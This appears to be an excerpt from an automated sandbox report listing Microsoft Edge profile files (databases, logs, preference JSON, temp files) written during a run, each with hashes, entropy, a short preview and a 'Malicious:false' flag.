                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                        MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                        SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                        SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                        SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ef892755-9d9e-4ef0-ad96-14c23c8cbe9a.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.226775261886322
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:72mdvkcYebvqBZFUt8O201/+O2az51cYebvqBaJ:73kcYebvyg8OHdl1cYebvL
                                                                                                                                                                                                                                                                                                        MD5:B087ECB65D37D74293F72D166213C8C8
                                                                                                                                                                                                                                                                                                        SHA1:38E4FF4B3CC07D2E2550984C717A93EE8E0368CA
                                                                                                                                                                                                                                                                                                        SHA-256:E3E6877047A89E785DF55FF88BEB625DB633B0650F67D094FDB96B68EED1A21F
                                                                                                                                                                                                                                                                                                        SHA-512:5F63B19D47C7E9D8526169AF7D8A50B1DCCCDBE5A20064A13BC62876149D80F571C3013E1B97F824C953C86FD7416F7AC45823C4B86B216ACCA574706BCC2EF9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:31.793 1ae0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-08:55:31.794 1ae0 Recovering log #3.2024/12/18-08:55:31.808 1ae0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.226775261886322
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:72mdvkcYebvqBZFUt8O201/+O2az51cYebvqBaJ:73kcYebvyg8OHdl1cYebvL
                                                                                                                                                                                                                                                                                                        MD5:B087ECB65D37D74293F72D166213C8C8
                                                                                                                                                                                                                                                                                                        SHA1:38E4FF4B3CC07D2E2550984C717A93EE8E0368CA
                                                                                                                                                                                                                                                                                                        SHA-256:E3E6877047A89E785DF55FF88BEB625DB633B0650F67D094FDB96B68EED1A21F
                                                                                                                                                                                                                                                                                                        SHA-512:5F63B19D47C7E9D8526169AF7D8A50B1DCCCDBE5A20064A13BC62876149D80F571C3013E1B97F824C953C86FD7416F7AC45823C4B86B216ACCA574706BCC2EF9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:31.793 1ae0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-08:55:31.794 1ae0 Recovering log #3.2024/12/18-08:55:31.808 1ae0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.240826026217858
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQB+q2PsZ23oH+TcwtpIFUt8ORQXWZmw+ORQDG3VkwOsZ23oH+Tcwta/WLJ:72B+vkcYebmFUt8O2XW/+O2DG3V51cYM
                                                                                                                                                                                                                                                                                                        MD5:869914EE4C1EDD7E315C0FC607C31DCC
                                                                                                                                                                                                                                                                                                        SHA1:74F5995FEADCCBB3F561AFC32457FA32B16E00D4
                                                                                                                                                                                                                                                                                                        SHA-256:322E8B8A7E0228693B8E6813B081B98015CA081676FCE9B396A1E40797D9D579
                                                                                                                                                                                                                                                                                                        SHA-512:F2E4FAFC9B2A7ADCBF46FD1C9AF05A7710232D5BC639485CD429E4B5FE33E7448055C171315BFA6F67662F0D8DD6E578FB03134FA3ED884F2A20D72D8C6705A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.271 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-08:55:33.274 195c Recovering log #3.2024/12/18-08:55:33.278 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.240826026217858
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQB+q2PsZ23oH+TcwtpIFUt8ORQXWZmw+ORQDG3VkwOsZ23oH+Tcwta/WLJ:72B+vkcYebmFUt8O2XW/+O2DG3V51cYM
                                                                                                                                                                                                                                                                                                        MD5:869914EE4C1EDD7E315C0FC607C31DCC
                                                                                                                                                                                                                                                                                                        SHA1:74F5995FEADCCBB3F561AFC32457FA32B16E00D4
                                                                                                                                                                                                                                                                                                        SHA-256:322E8B8A7E0228693B8E6813B081B98015CA081676FCE9B396A1E40797D9D579
                                                                                                                                                                                                                                                                                                        SHA-512:F2E4FAFC9B2A7ADCBF46FD1C9AF05A7710232D5BC639485CD429E4B5FE33E7448055C171315BFA6F67662F0D8DD6E578FB03134FA3ED884F2A20D72D8C6705A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.271 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-08:55:33.274 195c Recovering log #3.2024/12/18-08:55:33.278 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old~RF2f2e2.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.240826026217858
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQB+q2PsZ23oH+TcwtpIFUt8ORQXWZmw+ORQDG3VkwOsZ23oH+Tcwta/WLJ:72B+vkcYebmFUt8O2XW/+O2DG3V51cYM
                                                                                                                                                                                                                                                                                                        MD5:869914EE4C1EDD7E315C0FC607C31DCC
                                                                                                                                                                                                                                                                                                        SHA1:74F5995FEADCCBB3F561AFC32457FA32B16E00D4
                                                                                                                                                                                                                                                                                                        SHA-256:322E8B8A7E0228693B8E6813B081B98015CA081676FCE9B396A1E40797D9D579
                                                                                                                                                                                                                                                                                                        SHA-512:F2E4FAFC9B2A7ADCBF46FD1C9AF05A7710232D5BC639485CD429E4B5FE33E7448055C171315BFA6F67662F0D8DD6E578FB03134FA3ED884F2A20D72D8C6705A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.271 195c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-08:55:33.274 195c Recovering log #3.2024/12/18-08:55:33.278 195c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0033769341339387224
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:ImtVuIlp1l5Pl/lll:IiVuIl71
                                                                                                                                                                                                                                                                                                        MD5:80879043305D6BE4AE43F7C711BF39EF
                                                                                                                                                                                                                                                                                                        SHA1:0522FFF052B29BAAC475277A53D9CA5FA38FAE4C
                                                                                                                                                                                                                                                                                                        SHA-256:79862A3169E97E7170F8D4BB473FB69C2A263EF97E640663C2E907906FB1BC27
                                                                                                                                                                                                                                                                                                        SHA-512:160451D9706986C0E6408F5735B68ED671143C0AF3AAD7659745828F2DF04BAADA628C47B33EA83EFA3A81EEF48DF13C151CC65541C02D7E6D54615B22C381D1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:VLnk.....?.......,.I'...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.2648807415577232
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkMpSAELyKOMq+8lMAjdnG2hVumv:Bq+n0Jp9ELyKOMq+8lVU2N
                                                                                                                                                                                                                                                                                                        MD5:B5BEE46329F1C0B8D880739604C06C0B
                                                                                                                                                                                                                                                                                                        SHA1:AD0B2BEB47C8D15781E2B7155D4A05064A700C29
                                                                                                                                                                                                                                                                                                        SHA-256:D4E323FDD57AED0DC684B10E4F751878AEB5FEDA3A323D88732C6C42BEAB0EB4
                                                                                                                                                                                                                                                                                                        SHA-512:E0DC1C011949BB7D04790508A46E415FEE71307000BAFC116400DD2121568EEDE33ABD14ED682C5B3061B5AFB3A0BF9F16FED30825073C67797C930522308980
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bcabe355-d979-4e7a-aa57-60f8ba633311.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):10834
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2071741862979515
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Y+6kz3o88bV+FCHQArU2aPcKJ:stqvstQcV3jee+IbGOQCU2U
                                                                                                                                                                                                                                                                                                        MD5:85BE3181C71C44B3C3FA0C7D84EA5FB8
                                                                                                                                                                                                                                                                                                        SHA1:AEDACE195C5C0097B09536784ED5D052CFD69721
                                                                                                                                                                                                                                                                                                        SHA-256:C674D897B7CF4AA02F2E7C9329E751AFF8B1639C1CF0E5E7E675D849DC4CB14C
                                                                                                                                                                                                                                                                                                        SHA-512:7079FDD6B7BBBB371E30ACF260EE3E39730DF445B37567976B540BDCDF634DD39C07C02EA19A7B34E8941AD12333824386355EAAF0B02E71B42DD6A77F6DAE23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d62b7fd2-5cb5-4d11-bebf-708a45fe6a0e.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e83d1606-b980-4a3f-95ad-89fa657d2b94.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10833
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.207390619487114
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Y+6kz3o88bV+FCHQAr42aPcKJ:stqvstQcV3jee+IbGOQC42U
                                                                                                                                                                                                                                                                                                        MD5:5E8181FB52FFBFD0193B46A132D5A5F1
                                                                                                                                                                                                                                                                                                        SHA1:B440E604055A013D6DE2AF607F9DEB5D829BA308
                                                                                                                                                                                                                                                                                                        SHA-256:7D412A546A757D1BFFF0626B2D6CEF7A88FD0E83402E595A327A31928930D700
                                                                                                                                                                                                                                                                                                        SHA-512:24DCDA77A719B71BFF6BD7825C3A49007E403ED0F88993683B353974E37B1316992E94CF80C5C7973518FBC029BEEC24F2D93409D8ACD18C38F9187792352247
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ea3de675-b675-4258-9d84-eab7ba341a80.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ee5b0175-2578-4633-88d0-ab4ace30f38a.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10021
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111847723498965
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/sDQcsmDwmw5Bkz3o88bV+FCHQArGBCdcKJ:stqvsDQcsoe/bGOQCEC
                                                                                                                                                                                                                                                                                                        MD5:706B8D72C95C837D64A3941B31D897A0
                                                                                                                                                                                                                                                                                                        SHA1:B75F19CBE1274A1563FF36F09F5135A3BE6479D0
                                                                                                                                                                                                                                                                                                        SHA-256:ECC6E25DA9F4C396F7A617F0D1915C15AF2BB8F4F908A2BC23599C04973B0CFD
                                                                                                                                                                                                                                                                                                        SHA-512:90B24A3160D5A6273334DEB79717A80FFD7AB9DC48C1FCFAE836209A0D6C2628101A9DEED0BA725A88CF1F7686FDFEE9B9221F21447C5FDB5124040541E924B8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
